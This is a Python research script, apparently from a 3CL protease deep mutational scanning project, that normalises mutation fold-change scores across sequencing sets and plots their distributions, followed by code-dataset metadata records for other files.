2021-04-13T19:27:36.000Z
scripts/matrix_transform.py
ChavezResearchLab/3CL_protease_DMS
14593bdbc4586393eec6ec1d9ebbf3ef34eda44b
[ "MIT" ]
1
2021-02-09T23:16:38.000Z
2021-02-09T23:16:38.000Z
#!/Users/jennysheng/anaconda3/envs/tools/bin/python import sys import os import glob import numpy as np import pandas as pd import gzip import matplotlib.pyplot as plt from scipy import stats from scipy.optimize import curve_fit import itertools from collections import Counter import plotly.express as px import plotly.graph_objects as go from plotly.subplots import make_subplots wt_full = ('MSGFRKMAFPSGKVEGCMVQVTCGTTTLNGLWLDDVVYCPRHVICT' 'SEDMLNPNYEDLLIRKSNHNFLVQAGNVQLRVIGHSMQNCVLKLKV' 'DTANPKTPKYKFVRIQPGQTFSVLACYNGSPSGVYQCAMRPNFTIK' 'GSFLNGSCGSVGFNIDYDCVSFCYMHHMELPTGVHAGTDLEGNFYG' 'PFVDRQTAQAAGTDTTITVNVLAWLYAAVINGDRWFLNRFTTTLND' 'FNLVAMKYNYEPLTQDHVDILGPLSAQTGIAVLDMCASLKELLQNG' 'MNGRTILGSALLEDEFTPFDVVRQCSGVTFQ') def original_dist( folder, suffix, samples, sets, res_redo, all_sets, save = False, **kwarg): ''' Distribution shape of original scores from screen. _______________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name if save = True add kwarg name: file path for saving figure ''' fig = make_subplots( rows=5, cols=6) layout= itertools.product(range(1,6), range(1,7)) for x, pos in list(zip(sets + res_redo, layout)): # old replicates if x in sets: fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ +str(x) + suffix, index_col = [0]) flat_list = [item for sublist in fchange.values for item in sublist] fig.add_trace(go.Histogram(x=flat_list, xbins=dict(# bins for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) # new replicates single residues elif x in res_redo: start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] sites = list(samples[samples['Set'] == str(x)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites.split(',')] fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ +str(x) +suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in 
list(range(start, end))] fchange = fchange[sites] flat_list = [item for sublist in fchange.values for item in sublist] fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) fig.update_layout(height=700, width=900, title_text=kwarg['title']) fig.show() if save == True: plotly.offline.plot(fig, filename = kwarg['name']) def transform_sigma(folder, suffix, samples, sets, res_redo, all_sets): ''' Takes the folder and the suffix of the files and computes the standard deviations--scaling factors--for all sets. ____________ Input: folder--name of category in the sample spreadsheet that points to folder where data are stored suffix--suffix of the file name Output: list in which each element is paired. First item in pair is the set, second is the numerical value for the standard deviation --scaling factor--of the set. ''' sigma_list = [] for x in all_sets: fchange = pd.read_csv(list(samples[samples['Set']==str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] # name the columns wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist in fchange.values for item \ in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() # mean of the set var = flat_list[~np.isnan(flat_list)].var() # variance of the set # set the variance of all set to 1 var_norm = (flat_list-mean)/np.sqrt(var)+mean sigma_list.append([x, np.sqrt(var)]) return(sigma_list) def transform_dist( folder, suffix, samples, sets, res_redo, all_sets, set21, save = False, **kwarg): ''' Distribution shape of original scores from screen. 
___________________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name if save = True add kwarg name: file path for saving figure ''' # average value of wt # average value of stop codon # number of residues in set mean_stop = {} len_set = {} fig = make_subplots( rows=5, cols=6) layout= itertools.product(range(1,6), range(1,7)) for x, pos in list(zip(sets + res_redo + set21, layout)): if x in sets: fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] # name the columns wt_subseq = wt_full[start:end] #find WT residues for the set fchange.columns = ['Res '+str(x) for x in list(range(start, end))] #set average wt to 0 cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean # add to dict for mean stop mean_stop[str(x)] = np.mean(fchange.loc['*']) len_set[str(x)] = len(fchange.columns) stop_mean = np.mean(fchange.loc['*']) scale_factor = -1/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor flatten_fchange = fchange_norm.values flat_list = np.array([item for sublist in flatten_fchange for\ item in sublist]) fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) elif x in set21: fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] # name the columns wt_subseq = wt_full[start:end] #find WT residues for the set 
fchange.columns = ['Res '+str(x) for x in list(range(start, end))] #set average wt to 0 cols = fchange.columns[:2] wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean # add to dict for mean stop mean_stop[str(x)] = np.mean(fchange.loc['*'][:2]) len_set[str(x)] = 2 stop_mean = np.mean(fchange.loc['*'][:2]) scale_factor = -1/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor flatten_fchange = fchange_norm.values flat_list = np.array([item for sublist in flatten_fchange for\ item in sublist]) fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) else: # for all individually repeated residues set_ind = x.find('R') #identify the R notation for the repeated set set_redo = x[:set_ind] start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(x)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] #find WT residues for the set wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) fchange = fchange-wt_mean stop_mean = np.mean(fchange.loc['*']) scale_factor = mean_stop[set_redo]/stop_mean fchange_norm = fchange*scale_factor # print(x, np.mean(wt_vals), np.var(wt_vals)) flatten_fchange = fchange_norm.values flat_list = np.array([item for sublist in flatten_fchange for \ item in sublist]) fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins used 
for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) fig.update_layout(height=700, width=900, title_text=kwarg['title']) fig.show() if save == True: plotly.offline.plot(fig, filename = kwarg['name']) def transform_dist_sigma( folder, suffix, samples, sets, res_redo, all_sets, save = False, **kwarg): ''' Distribution shape of original scores from screen. WT from each set is set to 0 and variance of each set is set to 1. ___________________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name samples: dataframe of sample_spreadsheet with data specs sets: complete sets res_redo: residues that were individually sequenced all_sets: all sets including those that were individually resequenced if save = True add kwarg name: file path for saving figure ''' # average value of wt # average value of stop codon # number of residues in set mean_stop = {} len_set = {} fig = make_subplots( rows=5, cols=6) layout= itertools.product(range(1,6), range(1,7)) for x, pos in list(zip(sets + res_redo, layout)): if x in sets: fchange = pd.read_csv(list(samples[samples['Set']\ ==str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] # name the columns fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist in fchange.values for item in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() # mean of the set var = flat_list[~np.isnan(flat_list)].var() # variance of the set # set the variance of all sets to 1 fchange_norm = (fchange-mean)/np.sqrt(var) + mean fchange_norm.columns = ['Res '+str(x) for x in list(range(start, end))] # name the columns #set average wt to 0 cols = fchange_norm.columns wt_vals = [] for row, col in zip(wt_subseq, cols): 
wt_vals.append(fchange_norm.loc[row, col]) fchange_norm = fchange_norm - np.mean(wt_vals) # add to dict for mean stop mean_stop[str(x)] = np.mean(fchange_norm.loc['*']) len_set[str(x)] = len(fchange_norm.columns) flatten_fchange = fchange_norm.values flat_list = np.array([item for sublist in flatten_fchange for item in sublist]) fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins used for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) else: # for all individually repeated residues set_ind = x.find('R') #identify the R notation for the repeated set set_redo = x[:set_ind] start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(x)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(list(samples[samples['Set']\ ==str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) stop_mean = np.mean(fchange.loc['*']) scale_factor = mean_stop[set_redo]/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor # print(x, np.mean(wt_vals), np.var(wt_vals)) flatten_fchange = fchange_norm.values flat_list = np.array([item for sublist in\ flatten_fchange for item in sublist]) fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins used for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) fig.update_layout(height=700, width=900, title_text=kwarg['title']) fig.show() if save == True: plotly.offline.plot(fig, filename = kwarg['name']) def transform_dist_mat(folder, suffix, samples, sets, res_redo, 
all_sets): ''' Distribution shape of original scores from screen. ___________________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name if save = True add kwarg name: file path for saving figure ''' # average value of wt # average value of stop codon # number of residues in set len_set = {} df_list = [] mean_stop = {} for x in sets + res_redo: if x in sets: fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist in fchange.values for\ item in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() # mean of the set var = flat_list[~np.isnan(flat_list)].var() # variance of the set fchange.columns = ['Res '+str(x) for x in list(range(start, end))] #set average wt to 0 cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean mean_stop[str(x)] = np.mean(fchange.loc['*']) # add to mean stop len_set[str(x)] = len(fchange.columns) stop_mean = np.mean(fchange.loc['*']) scale_factor = 1/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor flatten_fchange = fchange_norm.values df_list.append(fchange_norm) else: # for all individually repeated residues set_ind = x.find('R') #identify the R notation for the repeated set set_redo = x[:set_ind] start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(x)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ + str(x) + suffix, 
index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] #find WT residues for the set wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) stop_mean = np.mean(fchange.loc['*']) scale_factor = mean_stop[set_redo]/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor df_list.append(fchange_norm) return df_list def transform_matrix(folder, suffix, samples, sets, res_redo, all_sets, set21): ''' Transform each set so that WT fixed at 0 and stop codon is normalized to -1 in each set. __________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name samples: sample spreadsheet sets: all complete sets res_redo: all invividually resequenced sets all_sets: all sets set21: set21--treated separately because of the C terminus ''' mean_stop = {} len_set = {} set_list = [] for file in sets: fchange = pd.read_csv(list(samples[samples['Set']==\ str(file)][folder])[0]\ +str(file) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist in fchange.values\ for item in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() # mean of the set var = flat_list[~np.isnan(flat_list)].var() # variance of the set fchange.columns = ['Res '+str(x) for x in list(range(start, end))] #set average wt to 0 cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean mean_stop[str(file)] = np.mean(fchange.loc['*']) 
len_set[str(file)] = len(fchange.columns) stop_mean = np.mean(fchange.loc['*']) scale_factor = -1/stop_mean fchange_norm = fchange*scale_factor set_list.append(fchange_norm) for file in set21: fchange = pd.read_csv(list(samples[samples['Set']==\ str(file)][folder])[0]\ + str(file) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] # name the columns wt_subseq = wt_full[start:end] #find WT residues for the set fchange.columns = ['Res '+str(x) for x in list(range(start, end))] #set average wt to 0 cols = fchange.columns[:2] wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean # add to dict for mean stop mean_stop[str(file)] = np.mean(fchange.loc['*'][:2]) len_set[str(file)] = 2 stop_mean = np.mean(fchange.loc['*'][:2]) scale_factor = -1/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor set_list.append(fchange_norm) set_list_res = [] for file in res_redo: set_ind = file.find('R') #identify the R notation for the repeated set set_redo = file[:set_ind] start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(file)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(list(samples[samples['Set']==\ str(file)][folder])[0]\ + str(file) + suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) fchange = fchange-wt_mean stop_mean = np.mean(fchange.loc['*']) scale_factor = -1/stop_mean fchange_norm = 
fchange *scale_factor set_list_res.append(fchange_norm) all_residues = pd.concat(set_list, axis = 1) all_res_redo = pd.concat(set_list_res, axis = 1) all_res_redo = all_res_redo.fillna('NaN') all_residues.update(all_res_redo) order = ['Res '+str(x) for x in range(1, 307)] all_residues = all_residues[order] all_residues = all_residues.applymap(lambda x: x if not \ isinstance(x, str) else np.nan) return(all_residues) def raw_dist(folder, samples, sets, res_redo, all_sets): ''' Returns the mean and standard error of the raw data. __________ Input: folder--folder where the datasets are stored. points to column in sample spreadsheet (string) Output: melted dataframe with residue and mutation along with raw means and standard deviations ''' fchange_list = [] redo_list = [] for x in sets + res_redo: # old replicates start = list(samples[samples['Set']==str(x)]['Start range'])[0] end = list(samples[samples['Set']==str(x)]['End range'])[0] sites = list(samples[samples['Set']==str(x)]['Sites'])[0] directory = list(samples[samples['Set']==str(x)][folder])[0] if x in sets: for y in range(start, end): fchange = pd.read_csv(directory + '/set' + str(x) + \ '_residue' + str(y) + '.csv') fchange['residue'] = [y]*len(fchange) fchange_list.append(fchange) # new replicates single residues elif x in res_redo: sites = [str(x) for x in sites.split(',')] for y in sites: fchange = pd.read_csv(directory + '/set' + str(x) + \ '_residue' + y + '.csv') fchange['residue'] = [y]*len(fchange) fchange_list.append(fchange) redo_list.append(fchange) #list of residues and amino acids along with raw mean and standard error error = pd.concat(fchange_list) mid = [x[1] for x in error['Translation']] error['middle'] = mid return(error) def transform_matrix_sigma(folder, suffix, samples, sets, res_redo, all_sets): ''' Transforms the data by set such that all the wildtypes are fixed at zero and standard deviation of each set is set to 1. 
__________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name samples: sample spreadsheet sets: all complete sets res_redo: all invividually resequenced sets all_sets: all sets ''' mean_stop = {} len_set = {} set_list = [] for file in sets: fchange = pd.read_csv(list(samples[samples['Set'] ==str(file)][folder])[0]\ +str(file) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist in fchange.values \ for item in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() # mean of the set var = flat_list[~np.isnan(flat_list)].var() # variance of the set # set the variance of all set to 1 # normalize the set to unit variance fchange_norm = (fchange-mean)/np.sqrt(var)+mean #new label for columns fchange_norm.columns = ['Res '+str(x) for x in list(range(start, end))] #figure out average wt values for set and linear transform cols = fchange_norm.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange_norm.loc[row, col]) fchange_norm = fchange_norm - np.mean(wt_vals) # add to dict for mean stop mean_stop[str(file)] = np.mean(fchange_norm.loc['*']) len_set[str(file)] = len(fchange_norm.columns) set_list.append(fchange_norm) set_list_res = [] for file in res_redo: set_ind = file.find('R') #identify the R notation for the repeated set set_redo = file[:set_ind] start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(file)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(list(samples[samples['Set']\ ==str(file)][folder])[0]\ + str(file) + suffix, index_col = [0]) 
fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] #find WT residues for the set wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) stop_mean = np.mean(fchange.loc['*']) scale_factor = mean_stop[set_redo]/(stop_mean-wt_mean) fchange_norm = (fchange - wt_mean)*scale_factor set_list_res.append(fchange_norm) all_residues = pd.concat(set_list, axis = 1) all_res_redo = pd.concat(set_list_res, axis = 1) all_res_redo = all_res_redo.fillna('NaN') all_residues.update(all_res_redo) order = ['Res '+str(x) for x in range(1, 307)] all_residues = all_residues[order] all_residues = all_residues.applymap(lambda x: x\ if not isinstance(x, str) else np.nan) return(all_residues, mean_stop) def replicate(rep, replicate_folder, cond_suffix, samples, sets, res_redo, set21): ''' Tranform the raw foldchanges fro single biological replicates. 
__________ rep: int denoting replicate number replicate folder: column in sample spreadsheet containing replicate info cond_suffix: file suffix for replicate files samples: sample spreadsheet sets: all complete sequencing sets res_redo: all individually resequenced all_residues set21: set 21 to be treated specially for the C terminal portion Output: dataframe with score at each amino acid at each residue ''' mean_stop = {} len_set = {} rep1_set = [] set_list_res = [] # replicate 1 for file in sets + res_redo + set21: replicate_dir = list(samples[samples['Set'] == \ str(file)][replicate_folder])[0] if file in sets: fchange = pd.read_csv(replicate_dir + str(file) + '_replicate'+str(rep)+cond_suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean mean_stop[str(file)] = np.mean(fchange.loc['*']) len_set[str(file)] = len(fchange.columns) stop_mean = np.mean(fchange.loc['*']) scale_factor = -1/stop_mean fchange_norm = fchange*scale_factor rep1_set.append(fchange_norm) elif file in set21: fchange = pd.read_csv(replicate_dir + str(file) + '_replicate'+str(rep)+cond_suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] # name the columns wt_subseq = wt_full[start:end] #find WT residues for the set #set average wt to 0 cols = fchange.columns[:2] wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean # add to dict for mean stop mean_stop[str(file)] = 
np.mean(fchange.loc['*'][:2]) len_set[str(file)] = 2 stop_mean = np.mean(fchange.loc['*'][:2]) scale_factor = -1/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor rep1_set.append(fchange_norm) elif file in res_redo: set_ind = file.find('R') #identify the R notation for the repeated set set_redo = file[:set_ind] start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(file)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(replicate_dir + str(file) + '_replicate'\ + str(rep) + cond_suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) stop_mean = np.mean(fchange.loc['*']) scale_factor = -1/stop_mean fchange_norm = fchange *scale_factor set_list_res.append(fchange_norm) all_residues = pd.concat(rep1_set, axis = 1) all_res_redo = pd.concat(set_list_res, axis = 1) all_res_redo = all_res_redo.fillna('NaN') all_residues.update(all_res_redo) order = ['Res '+ str(x) for x in range(1, 307)] all_residues = all_residues[order] all_residues = all_residues.applymap(lambda x: x if not \ isinstance(x, str) else np.nan) return(all_residues) def replicate_sigma(rep, replicate_folder, cond_suffix, samples, sets, res_redo): ''' Tranform the raw foldchanges fro single biological replicates. 
__________ rep: int denoting replicate number replicate folder: column in sample spreadsheet containing replicate info cond_suffix: file suffix for replicate files samples: sample spreadsheet sets: all complete sequencing sets res_redo: all individually resequenced all_residues set21: set 21 to be treated specially for the C terminal portion Output: dataframe with score at each amino acid at each residue ''' mean_stop = {} len_set = {} rep1_set = [] set_list_res = [] # replicate 1 for file in sets + res_redo: replicate_dir = list(samples[samples['Set'] ==str(file)][replicate_folder])[0] if file in sets: fchange = pd.read_csv(replicate_dir + str(file)\ + '_replicate'+str(rep)+cond_suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist \ in fchange.values for item in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() var = flat_list[~np.isnan(flat_list)].var() # set the variance of all set to 1 var_norm = (flat_list-mean)/np.sqrt(var)+mean fchange_norm = (fchange-mean)/np.sqrt(var) + mean # add to dict for mean stop mean_stop[str(file)] = np.mean(fchange_norm.loc['*']) len_set[str(file)] = len(fchange_norm.columns) #new label for columns fchange_norm.columns = ['Res '+str(x) for x in \ list(range(start, end))] # name the columns #figure out average wt values for set and linear transform cols = fchange_norm.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange_norm.loc[row, col]) fchange_norm = fchange_norm - np.mean(wt_vals) rep1_set.append(fchange_norm) elif file in res_redo: set_ind = file.find('R') #R denotes the repeated set set_redo = file[:set_ind] start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == 
str(file)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(file)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(replicate_dir + str(file) \ + '_replicate'+str(rep)+cond_suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] #find WT residues for the set wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] flat_list = np.array([item for sublist in fchange.values\ for item in sublist]) cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) stop_mean = np.mean(fchange.loc['*']) scale_factor = mean_stop[set_redo]/(stop_mean-wt_mean) fchange_norm = (fchange - wt_mean)*scale_factor set_list_res.append(fchange_norm) all_residues = pd.concat(rep1_set, axis = 1) all_res_redo = pd.concat(set_list_res, axis = 1) all_res_redo = all_res_redo.fillna('NaN') all_residues.update(all_res_redo) order = ['Res '+ str(x) for x in range(1, 307)] all_residues = all_residues[order] all_residues = all_residues.applymap(lambda x: x if not \ isinstance(x, str) else np.nan) return(all_residues)
41.991031
82
0.574861
4,962
37,456
4.177348
0.057033
0.018333
0.058182
0.067879
0.902354
0.89946
0.893043
0.88957
0.877895
0.857005
0
0.009877
0.302648
37,456
891
83
42.038159
0.783691
0.172683
0
0.850891
0
0
0.042885
0.010096
0
0
0
0
0
1
0.016207
false
0
0.02269
0
0.040519
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
fb4c9cad4b626507dbbef81e6d792bf53ef84e30
183
py
Python
SegmentEditorWatershed/SegmentEditorWatershedLib/__init__.py
RMR54/SlicerSegmentEditorExtraEffects
fa238555cc1d48078a85665d1fe757cfe80a56fa
[ "BSD-3-Clause" ]
null
null
null
SegmentEditorWatershed/SegmentEditorWatershedLib/__init__.py
RMR54/SlicerSegmentEditorExtraEffects
fa238555cc1d48078a85665d1fe757cfe80a56fa
[ "BSD-3-Clause" ]
null
null
null
SegmentEditorWatershed/SegmentEditorWatershedLib/__init__.py
RMR54/SlicerSegmentEditorExtraEffects
fa238555cc1d48078a85665d1fe757cfe80a56fa
[ "BSD-3-Clause" ]
null
null
null
from SegmentEditorEffects.AbstractScriptedSegmentEditorEffect import * from SegmentEditorEffects.AbstractScriptedSegmentEditorLabelEffect import * from SegmentEditorEffect import *
36.6
75
0.896175
11
183
14.909091
0.545455
0.292683
0
0
0
0
0
0
0
0
0
0
0.076503
183
4
76
45.75
0.970414
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
fb4cf69bea5ec3a6ba9d2182b1e4e893a1f3a02e
12
py
Python
_draft/answers/x_9_3.py
ofl/kuku2
7247fb1862d917d23258ebe7a93dca5939433225
[ "MIT" ]
null
null
null
_draft/answers/x_9_3.py
ofl/kuku2
7247fb1862d917d23258ebe7a93dca5939433225
[ "MIT" ]
1
2021-11-13T08:03:04.000Z
2021-11-13T08:03:04.000Z
_draft/answers/x_9_3.py
ofl/kuku2
7247fb1862d917d23258ebe7a93dca5939433225
[ "MIT" ]
null
null
null
# x_9_3 # #
3
7
0.416667
3
12
1
1
0
0
0
0
0
0
0
0
0
0
0.25
0.333333
12
3
8
4
0.125
0.416667
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
1
1
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
1
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
8
fb56336063a8a1523f6e8c353850fcd4ef128a0c
179,364
py
Python
src/concurrency/_csdata_test.py
GStepien/CSToolkit
7a6872356f71843816a53c42b9abf5ae1ed97adf
[ "BSD-3-Clause" ]
null
null
null
src/concurrency/_csdata_test.py
GStepien/CSToolkit
7a6872356f71843816a53c42b9abf5ae1ed97adf
[ "BSD-3-Clause" ]
null
null
null
src/concurrency/_csdata_test.py
GStepien/CSToolkit
7a6872356f71843816a53c42b9abf5ae1ed97adf
[ "BSD-3-Clause" ]
null
null
null
